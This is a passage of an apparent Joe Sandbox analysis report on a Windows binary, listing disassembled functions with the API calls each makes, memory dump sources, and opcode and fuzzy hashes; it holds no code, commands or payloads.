                                              • Opcode ID: 09e4ae385001684533c99631b37a6e9f872f7cff59a89b13441a897b93b9484c
                                              • Instruction ID: 1bbcaa06f9f71afe16666764a3ca0af56b28eba42e99a6eb41c0663e87e92549
                                              • Opcode Fuzzy Hash: 09e4ae385001684533c99631b37a6e9f872f7cff59a89b13441a897b93b9484c
                                              • Instruction Fuzzy Hash: 85315E71914205EBCF10EFA4DC85EAEB7B8EF49311B1880E5FD04AB256DB709E54DBA0
                                              Function 00BB67F8 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00BB6810
                                              • GetDC.USER32(00000000), ref: 00BB6818
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00BB6823
                                              • ReleaseDC.USER32(00000000,00000000), ref: 00BB682F
                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00BB686B
                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00BB687C
                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00BB964F,?,?,000000FF,00000000,?,000000FF,?), ref: 00BB68B6
                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00BB68D6
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                              • String ID:
                                              • API String ID: 3864802216-0
                                              • Opcode ID: 497d42170ecef1dea08eae597128dea69ade5292f10bcfe7ed753c010632b821
                                              • Instruction ID: f02d7f8ce413f8294b3d3993a54f6ef5fb8e697f7b0784ccccbb7da67b2c9aac
                                              • Opcode Fuzzy Hash: 497d42170ecef1dea08eae597128dea69ade5292f10bcfe7ed753c010632b821
                                              • Instruction Fuzzy Hash: C3316B72111214BFEB119F10CC8AFEA3BA9EB49761F044065FE08AA291CAB59C51CBB0
                                              Function 00B8C748 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memcmp
                                              • String ID:
                                              • API String ID: 2931989736-0
                                              • Opcode ID: a5c811123359b5f6e7b3ab9094b8f388b4ecd41148051757f40e6068cc6e8210
                                              • Instruction ID: 8b854e1f4e7b61379710d2ff66f5fdb6a6d2ca4b3df31ce2b56d3618ea154c9e
                                              • Opcode Fuzzy Hash: a5c811123359b5f6e7b3ab9094b8f388b4ecd41148051757f40e6068cc6e8210
                                              • Instruction Fuzzy Hash: D121D7F66012057AD20475659D82FBF3BECDE15B84F0480E4FE06A6262E731DE15C7B1
                                              Function 00B9F166 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 323COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                                • Part of subcall function 00B4436A: _wcscpy.LIBCMT ref: 00B4438D
                                              • _wcstok.LIBCMT ref: 00B9F2D7
                                              • _wcscpy.LIBCMT ref: 00B9F366
                                              • _memset.LIBCMT ref: 00B9F399
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                              • String ID: X
                                              • API String ID: 774024439-3081909835
                                              • Opcode ID: 88374035cc3fc0770c53061c907cdd7155a612299dfa6ed70c65b6a73fd21c9a
                                              • Instruction ID: 4297ba98413f7e9b26f27f584e76b3f295bb6403c12a90a02cd58d6ef5c950c7
                                              • Opcode Fuzzy Hash: 88374035cc3fc0770c53061c907cdd7155a612299dfa6ed70c65b6a73fd21c9a
                                              • Instruction Fuzzy Hash: A6C17E715083419FCB24EF68C881A6AB7E4FF45320F1549BDF899972A2DB30ED45CB92
                                              Function 00BA71EE Relevance: 10.8, APIs: 7, Instructions: 250networkCOMMON
                                              Download Yara Rule
                                              APIs
                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00BA72EB
                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00BA730C
                                              • WSAGetLastError.WSOCK32(00000000), ref: 00BA731F
                                              • htons.WSOCK32(?,?,?,00000000,?), ref: 00BA73D5
                                              • inet_ntoa.WSOCK32(?), ref: 00BA7392
                                                • Part of subcall function 00B8B4EA: _strlen.LIBCMT ref: 00B8B4F4
                                                • Part of subcall function 00B8B4EA: _memmove.LIBCMT ref: 00B8B516
                                              • _strlen.LIBCMT ref: 00BA742F
                                              • _memmove.LIBCMT ref: 00BA7498
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                              • String ID:
                                              • API String ID: 3619996494-0
                                              • Opcode ID: 8523643e79b6209bb4442668e3c5dca0d4becfa73385aa07e5301aafa20d68a7
                                              • Instruction ID: 44c631dd771422ce60678601805f798dec5eb160f75344baf1c9e4a752819cfb
                                              • Opcode Fuzzy Hash: 8523643e79b6209bb4442668e3c5dca0d4becfa73385aa07e5301aafa20d68a7
                                              • Instruction Fuzzy Hash: 1281AE7154C300ABD710EB24DC82F6BB7E8EB89714F244998F9569B292DF70ED41CB91
                                              Function 00B31800 Relevance: 10.7, APIs: 7, Instructions: 219COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7f23d37380fd969f50e7a8f1e36f65b62b6c7a818f2c843b6f2a594f641403ba
                                              • Instruction ID: 5706fce0d7befcccfb6472f984d6855d57173be25fb9c07a5d28c5d4d1a2ad35
                                              • Opcode Fuzzy Hash: 7f23d37380fd969f50e7a8f1e36f65b62b6c7a818f2c843b6f2a594f641403ba
                                              • Instruction Fuzzy Hash: 5E715D70900109EFCB05DF98CC89EAEBBB9FF85314F248599F915AB251C734AA51CFA4
                                              Function 00BBB9C3 Relevance: 10.7, APIs: 7, Instructions: 199windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • IsWindow.USER32(01945748), ref: 00BBBA5D
                                              • IsWindowEnabled.USER32(01945748), ref: 00BBBA69
                                              • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 00BBBB4D
                                              • SendMessageW.USER32(01945748,000000B0,?,?), ref: 00BBBB84
                                              • IsDlgButtonChecked.USER32(?,?), ref: 00BBBBC1
                                              • GetWindowLongW.USER32(01945748,000000EC), ref: 00BBBBE3
                                              • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00BBBBFB
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                              • String ID:
                                              • API String ID: 4072528602-0
                                              • Opcode ID: 6ae09b2eccbf43ed4cde268da2d539600c05a58c5a900e074b181b3806f8f838
                                              • Instruction ID: dea7e9517fb45e990310e07215e0cd9c74eba03ed6c4f4e1c2ec5cdb562a2937
                                              • Opcode Fuzzy Hash: 6ae09b2eccbf43ed4cde268da2d539600c05a58c5a900e074b181b3806f8f838
                                              • Instruction Fuzzy Hash: C6717B34A04604AFDB24AF54C8D4FFABBE9EB49310F1440D9E945972A5CFF1AC51DB60
                                              Function 00BAFB07 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 177COMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BAFB31
                                              • _memset.LIBCMT ref: 00BAFBFA
                                              • ShellExecuteExW.SHELL32(?), ref: 00BAFC3F
                                                • Part of subcall function 00B34D37: __itow.LIBCMT ref: 00B34D62
                                                • Part of subcall function 00B34D37: __swprintf.LIBCMT ref: 00B34DAC
                                                • Part of subcall function 00B4436A: _wcscpy.LIBCMT ref: 00B4438D
                                              • GetProcessId.KERNEL32(00000000), ref: 00BAFCB6
                                              • CloseHandle.KERNEL32(00000000), ref: 00BAFCE5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                              • String ID: @
                                              • API String ID: 3522835683-2766056989
                                              • Opcode ID: d553c56dcc1cadaab46812dffe3d05b7e9f1fe43096574cfe05aacd3fc612662
                                              • Instruction ID: e5b1291b8050f05bef70df7bfb8b08329ba91e9efbd8eab2982dace580a5c774
                                              • Opcode Fuzzy Hash: d553c56dcc1cadaab46812dffe3d05b7e9f1fe43096574cfe05aacd3fc612662
                                              • Instruction Fuzzy Hash: DD61AE75A0061ADFCB14EF94C891AAEB7F5FF49310F1484A9E816AB351DB30AD41CF90
                                              Function 00B9174C Relevance: 10.7, APIs: 7, Instructions: 166windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32(?), ref: 00B9178B
                                              • GetKeyboardState.USER32(?), ref: 00B917A0
                                              • SetKeyboardState.USER32(?), ref: 00B91801
                                              • PostMessageW.USER32(?,00000101,00000010,?), ref: 00B9182F
                                              • PostMessageW.USER32(?,00000101,00000011,?), ref: 00B9184E
                                              • PostMessageW.USER32(?,00000101,00000012,?), ref: 00B91894
                                              • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00B918B7
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: 8d6ce22e1e1b1b6c5c5f38ec9bec5c98c04d0de27e85a7e820d34225c635b182
                                              • Instruction ID: 8e7cd881c3ef0a30cde1c2f22146d49f86a69a6b9eeec10c98a6415885a8a500
                                              • Opcode Fuzzy Hash: 8d6ce22e1e1b1b6c5c5f38ec9bec5c98c04d0de27e85a7e820d34225c635b182
                                              • Instruction Fuzzy Hash: 7751D3A09087D73EFF36866C8855BB67EE99B06300F088DE9E0D5468D2C6989C85F760
                                              Function 00B91565 Relevance: 10.7, APIs: 7, Instructions: 165windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetParent.USER32(00000000), ref: 00B915A4
                                              • GetKeyboardState.USER32(?), ref: 00B915B9
                                              • SetKeyboardState.USER32(?), ref: 00B9161A
                                              • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00B91646
                                              • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00B91663
                                              • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00B916A7
                                              • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00B916C8
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: MessagePost$KeyboardState$Parent
                                              • String ID:
                                              • API String ID: 87235514-0
                                              • Opcode ID: aa1436dc922f87af5640ad96c7c12ac649d9c118125bfabfd97e9f57da757ff1
                                              • Instruction ID: 3e2d0ad6f8acb9199a0bd648310311e6ea644707d7855bfb73cce21cd5e4a9c9
                                              • Opcode Fuzzy Hash: aa1436dc922f87af5640ad96c7c12ac649d9c118125bfabfd97e9f57da757ff1
                                              • Instruction Fuzzy Hash: CD51D5A0A047D73DFF3287688C45BBA7EE99B06300F0C8DE9E1D5469C2C694AC94F750
                                              Function 00B95BB8 Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: _wcsncpy$LocalTime
                                              • String ID:
                                              • API String ID: 2945705084-0
                                              • Opcode ID: 8bed9de2911557d82ffbf791477312714aacb175c480c624b4dd2565015fc88b
                                              • Instruction ID: 59ca1bcb63cc33259fb985eae8985bda0fb3633b225965e3470f4e97cad0daf8
                                              • Opcode Fuzzy Hash: 8bed9de2911557d82ffbf791477312714aacb175c480c624b4dd2565015fc88b
                                              • Instruction Fuzzy Hash: 8A418066C6161875CB11EBB4CC46ACFB3F8EF09311F5088E6E909E3221E734A759C3A5
                                              Function 00B93B64 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00B94BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B93B8A,?), ref: 00B94BE0
                                                • Part of subcall function 00B94BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B93B8A,?), ref: 00B94BF9
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00B93BAA
                                              • _wcscmp.LIBCMT ref: 00B93BC6
                                              • MoveFileW.KERNEL32(?,?), ref: 00B93BDE
                                              • _wcscat.LIBCMT ref: 00B93C26
                                              • SHFileOperationW.SHELL32(?), ref: 00B93C92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                              • String ID: \*.*
                                              • API String ID: 1377345388-1173974218
                                              • Opcode ID: acbfb5b750c221839c626a75313b90646ed8839c59ef6501c6d027061fa5ce41
                                              • Instruction ID: de9c0107aaf04c2381800ec34fe281868d00088a1eca40103c52216e8b678a2e
                                              • Opcode Fuzzy Hash: acbfb5b750c221839c626a75313b90646ed8839c59ef6501c6d027061fa5ce41
                                              • Instruction Fuzzy Hash: E0416B71508345AACB62EB64C481ADBB7E8EF89740F5009BEF48AC3152EB34D6888752
                                              Function 00BB78B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • _memset.LIBCMT ref: 00BB78CF
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BB7976
                                              • IsMenu.USER32(?), ref: 00BB798E
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BB79D6
                                              • DrawMenuBar.USER32 ref: 00BB79E9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: Menu$Item$DrawInfoInsert_memset
                                              • String ID: 0
                                              • API String ID: 3866635326-4108050209
                                              • Opcode ID: 41aeef598cb09b2ed08c901e5edac18d4407f009007a4dba37971ff8839bed84
                                              • Instruction ID: d84cd0b0ae53e9fa904a07594d5a3d72b3c7e2109f96e2204c5f724bc130b3d9
                                              • Opcode Fuzzy Hash: 41aeef598cb09b2ed08c901e5edac18d4407f009007a4dba37971ff8839bed84
                                              • Instruction Fuzzy Hash: D6415B75A44209EFDB10DF94D884EEABBF5FF49350F0481A9E9959B250CBB0AD50CFA0
                                              Function 00BB1602 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00BB1631
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00BB165B
                                              • FreeLibrary.KERNEL32(00000000), ref: 00BB1712
                                                • Part of subcall function 00BB1602: RegCloseKey.ADVAPI32(?), ref: 00BB1678
                                                • Part of subcall function 00BB1602: FreeLibrary.KERNEL32(?), ref: 00BB16CA
                                                • Part of subcall function 00BB1602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00BB16ED
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00BB16B5
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: EnumFreeLibrary$CloseDeleteOpen
                                              • String ID:
                                              • API String ID: 395352322-0
                                              • Opcode ID: 4abbfdff8b3a08ad9291ad122ae92a9045eead366e7ed84c78aec424adde60b8
                                              • Instruction ID: ba6c212202a1483255b7e86c622fbe5e775bdc3552ad2ab9453e7494e6e7444e
                                              • Opcode Fuzzy Hash: 4abbfdff8b3a08ad9291ad122ae92a9045eead366e7ed84c78aec424adde60b8
                                              • Instruction Fuzzy Hash: E33138B191020DBFDB149F94DC99EFFB7BCEF08300F5405AAE512A3140EAB09E459BA0
                                              Function 00BB68F2 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00BB6911
                                              • GetWindowLongW.USER32(01945748,000000F0), ref: 00BB6944
                                              • GetWindowLongW.USER32(01945748,000000F0), ref: 00BB6979
                                              • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 00BB69AB
                                              • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 00BB69D5
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00BB69E6
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00BB6A00
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
                                              • API ID: LongWindow$MessageSend
                                              • String ID:
                                              • API String ID: 2178440468-0
                                              • Opcode ID: 7e16012bd695f81381ca9c1855729903e5bcd194ff70d4cda924b64a48c2c125
                                              • Instruction ID: a66ba6fa452f156765c68cca87fa98695ec751ccdf2d64bba8ed1134bfc0eb0f
                                              • Opcode Fuzzy Hash: 7e16012bd695f81381ca9c1855729903e5bcd194ff70d4cda924b64a48c2c125
                                              • Instruction Fuzzy Hash: 70311130648250AFDB21DF19DC88FA537E1EB4A794F1801E4F5948B2B2CBB6AC50DB50
                                              Function 00B8E287 Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8E2CA
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00B8E2F0
                                              • SysAllocString.OLEAUT32(00000000), ref: 00B8E2F3
                                              • SysAllocString.OLEAUT32(?), ref: 00B8E311
                                              • SysFreeString.OLEAUT32(?), ref: 00B8E31A
                                              • StringFromGUID2.OLE32(?,?,00000028), ref: 00B8E33F
                                              • SysAllocString.OLEAUT32(?), ref: 00B8E34D
                                              Memory Dump Source
                                              • Source File: 0000000A.00000002.2896340275.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                              • Associated: 0000000A.00000002.2896291842.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BC0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896406370.0000000000BE6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896463455.0000000000BF0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                              • Associated: 0000000A.00000002.2896485559.0000000000BF9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_10_2_b30000_Designing.jbxd
                                              Similarity
